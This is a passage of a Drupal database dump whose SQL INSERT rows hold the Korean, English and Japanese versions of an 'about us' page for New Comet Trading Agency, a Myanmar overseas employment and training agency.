Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자격시험</span><span style=\"mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격할</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어학당도</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및 교육을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">지원하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우수한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기능인력을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배출하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해외로</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">파견하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">끊임없이</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 23, 194, 'en', 0, '<p>&nbsp;<span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p><img src=\"/sites/default/files/inline-images/page01.jpg\" data-align=\"center\" data-entity-uuid=\"bb0a6309-0480-4e15-977d-7779b6ab5882\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page02.jpg\" data-align=\"center\" data-entity-uuid=\"3d648acd-e4d6-422e-96ec-0f4ef8a0ddaa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page03.jpg\" data-align=\"center\" data-entity-uuid=\"b4e48cbd-91b4-4348-a15c-c383659f5dff\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page04.jpg\" data-align=\"center\" data-entity-uuid=\"f62451bb-2aa5-4267-9cf7-76b35949208e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page05.jpg\" data-align=\"center\" data-entity-uuid=\"f7fdcca7-3b28-4e95-9a70-f8ca466d9476\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page06.jpg\" data-align=\"center\" data-entity-uuid=\"565a7606-51ac-43fc-9c7a-1f2fe7c3935d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page07.jpg\" data-align=\"center\" data-entity-uuid=\"241602f2-5bf8-4040-8551-8abbc9990697\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page08.jpg\" data-align=\"center\" data-entity-uuid=\"4ee88431-32e2-499a-873a-72b73c80dd87\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page09.jpg\" data-entity-uuid=\"f14ca664-92dd-4ef8-ac3e-6d7665765749\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page10.jpg\" data-entity-uuid=\"1bafeb42-76e2-496a-a9bb-90b065a98e37\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page11.jpg\" data-entity-uuid=\"9e05184a-372e-4ef0-aec6-040a7de4d8b5\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page12.jpg\" data-entity-uuid=\"e5ff5315-6ae9-4838-b6d0-5df07c2ac651\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page13.jpg\" data-entity-uuid=\"d8e1cc86-6131-4a2c-9b1a-387a91c23038\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page14.jpg\" data-entity-uuid=\"9b73fa8d-862d-4337-80d5-bbf9a45b1135\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page15.jpg\" data-entity-uuid=\"99d39ec1-71a6-43ab-9303-45f7f07a6c01\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page16.jpg\" data-entity-uuid=\"db0f80ea-271e-4bc0-85c9-e33617ed58be\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page17.jpg\" data-entity-uuid=\"249cb91a-e2ab-42f1-880d-08e1d3661363\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page18.jpg\" data-entity-uuid=\"1648c123-aec8-4914-94b5-6f74fc86d322\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page19.jpg\" data-entity-uuid=\"1483aff7-adb3-4f9d-bba2-26c25de4af05\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page20.jpg\" data-entity-uuid=\"e8ecf841-902b-4d50-a3db-9e840b757bb0\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page21.jpg\" data-entity-uuid=\"c1febdfa-ff0f-4b40-85b8-662e08593da9\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page22.jpg\" data-entity-uuid=\"2fa91eac-f8ad-4e49-a4ed-f30c44a54f97\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page23.jpg\" data-entity-uuid=\"01f43faf-2b33-446b-b89b-c870d79d8382\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page24.jpg\" data-entity-uuid=\"67b85639-9d9b-4dba-9e7e-104386c5d10b\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page25.jpg\" data-entity-uuid=\"a59b58d5-c9f3-44ec-8705-b4cae7c7abea\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page26.jpg\" data-entity-uuid=\"1ad640d5-c50a-4585-8518-2626580dcf51\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page27.jpg\" data-entity-uuid=\"6ba5b697-692e-4e17-95d5-30299f4c7807\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page28.jpg\" data-entity-uuid=\"ec9ac328-ce1c-4c50-bf7c-cee9f6ffc7bf\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page29.jpg\" data-entity-uuid=\"459f3255-eeea-4f27-952a-43eeef000608\" data-entity-type=\"file\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/page30.jpg\" data-entity-uuid=\"b24121df-13a4-4612-ab32-c11ca913e9f2\" data-entity-type=\"file\" data-align=\"center\">', '', 'full_html'),
('page', 0, 23, 194, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">当社は</span><span style=\"mso-bidi-font-size:10.5pt;\">2004</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年に設立し、登録</span><span style=\"mso-bidi-font-size:10.5pt;\">ID(295/2004</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ー</span><span style=\"mso-bidi-font-size:10.5pt;\">2005)</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">を持ち、サービスの提供を行ってきました。ニューコメットトレンディーグ海外エイジェンシー登録を</span><span style=\"mso-bidi-font-size:10.5pt;\">2023</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年にできまして、運営を始めました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ニューコメットトレーディング会社のグループ会社である</span><span style=\"mso-bidi-font-size:10.5pt;\">.</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ゼィーヤーニューコメットとしては自動車輸入許可をもらって現場用トラックや、旅行用と交通機関などに使用されるバスや色々な機械を日本から直接輸入をし、販売する事業を</span><span style=\"mso-bidi-font-size:10.5pt;\">25</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年間やり続けてきました。税金の納税もしっかり行なった上、</span><span style=\"mso-bidi-font-size:10.5pt;\">100</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">人の従業員を持つ事ができました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">それに、グループ会社であるニューコメットト建築会社、ゼィーヤシュェピーティー建築会社、アウンネーウィン建築会社でも政府からきょかおたくさん頂き、</span><span style=\"mso-bidi-font-size:10.5pt;\">200</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">人程の従業員を持った会社として動いております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">現在、ニューコメットトレンディグエイジェンシーでは韓国の造船所で働きたいミャンマー全国から民族問わず、商務部の下でシンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">そして、ドバイ、マレーシア、シンガポール、タイ、日本にもお仕事紹介できる様に力を注いでおります。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">ミャンマーの若者達には自分に合ったお仕事や自分らしさをたもちながら、日本の技術を勉強できるようにサポートをし続けたいと努力をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">日本語能力試験</span>(JLPT,<span style=\"mso-spacerun:yes;\">&nbsp; </span>JFT, NAT-TEST, TOP-J)<span lang=\"JA\">を合格した生徒はワークビザ、研修ビザなどて、いけるように提案をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">我々ニューコメットトレーディング会社からは経験豊富で、能力の高い研修生達を生み出し、海外の仕事チャンスを与えることに重ねて努力をしてまいります。</span><o:p></o:p></p><img src=\"/sites/default/files/inline-images/page01.jpg\" data-align=\"center\" data-entity-uuid=\"bb0a6309-0480-4e15-977d-7779b6ab5882\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page02.jpg\" data-align=\"center\" data-entity-uuid=\"3d648acd-e4d6-422e-96ec-0f4ef8a0ddaa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page03.jpg\" data-align=\"center\" data-entity-uuid=\"b4e48cbd-91b4-4348-a15c-c383659f5dff\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page04.jpg\" data-align=\"center\" data-entity-uuid=\"f62451bb-2aa5-4267-9cf7-76b35949208e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page05.jpg\" data-align=\"center\" data-entity-uuid=\"f7fdcca7-3b28-4e95-9a70-f8ca466d9476\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page06.jpg\" data-align=\"center\" data-entity-uuid=\"565a7606-51ac-43fc-9c7a-1f2fe7c3935d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page07.jpg\" data-align=\"center\" data-entity-uuid=\"241602f2-5bf8-4040-8551-8abbc9990697\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page08.jpg\" data-align=\"center\" data-entity-uuid=\"4ee88431-32e2-499a-873a-72b73c80dd87\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page09.jpg\" data-align=\"center\" data-entity-uuid=\"f14ca664-92dd-4ef8-ac3e-6d7665765749\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page10.jpg\" data-align=\"center\" data-entity-uuid=\"1bafeb42-76e2-496a-a9bb-90b065a98e37\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page11.jpg\" data-align=\"center\" data-entity-uuid=\"9e05184a-372e-4ef0-aec6-040a7de4d8b5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page12.jpg\" data-align=\"center\" data-entity-uuid=\"e5ff5315-6ae9-4838-b6d0-5df07c2ac651\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page13.jpg\" data-align=\"center\" data-entity-uuid=\"d8e1cc86-6131-4a2c-9b1a-387a91c23038\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page14.jpg\" data-align=\"center\" data-entity-uuid=\"9b73fa8d-862d-4337-80d5-bbf9a45b1135\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page15.jpg\" data-align=\"center\" data-entity-uuid=\"99d39ec1-71a6-43ab-9303-45f7f07a6c01\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page16.jpg\" data-align=\"center\" data-entity-uuid=\"db0f80ea-271e-4bc0-85c9-e33617ed58be\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page17.jpg\" data-align=\"center\" data-entity-uuid=\"249cb91a-e2ab-42f1-880d-08e1d3661363\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page18.jpg\" data-align=\"center\" data-entity-uuid=\"1648c123-aec8-4914-94b5-6f74fc86d322\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page19.jpg\" data-align=\"center\" data-entity-uuid=\"1483aff7-adb3-4f9d-bba2-26c25de4af05\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page20.jpg\" data-align=\"center\" data-entity-uuid=\"e8ecf841-902b-4d50-a3db-9e840b757bb0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page21.jpg\" data-align=\"center\" data-entity-uuid=\"c1febdfa-ff0f-4b40-85b8-662e08593da9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page22.jpg\" data-align=\"center\" data-entity-uuid=\"2fa91eac-f8ad-4e49-a4ed-f30c44a54f97\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page23.jpg\" data-align=\"center\" data-entity-uuid=\"01f43faf-2b33-446b-b89b-c870d79d8382\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page24.jpg\" data-align=\"center\" data-entity-uuid=\"67b85639-9d9b-4dba-9e7e-104386c5d10b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page25.jpg\" data-align=\"center\" data-entity-uuid=\"a59b58d5-c9f3-44ec-8705-b4cae7c7abea\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page26.jpg\" data-align=\"center\" data-entity-uuid=\"1ad640d5-c50a-4585-8518-2626580dcf51\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page27.jpg\" data-align=\"center\" data-entity-uuid=\"6ba5b697-692e-4e17-95d5-30299f4c7807\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page28.jpg\" data-align=\"center\" data-entity-uuid=\"ec9ac328-ce1c-4c50-bf7c-cee9f6ffc7bf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page29.jpg\" data-align=\"center\" data-entity-uuid=\"459f3255-eeea-4f27-952a-43eeef000608\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/page30.jpg\" data-align=\"center\" data-entity-uuid=\"b24121df-13a4-4612-ab32-c11ca913e9f2\" data-entity-type=\"file\">', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 23, 194, 'ko', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되어</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업자등록번호</span><span style=\"mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧무역대행</span><span style=\"mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">외국인고용업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">면허를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취득하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">활동을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는자매</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" 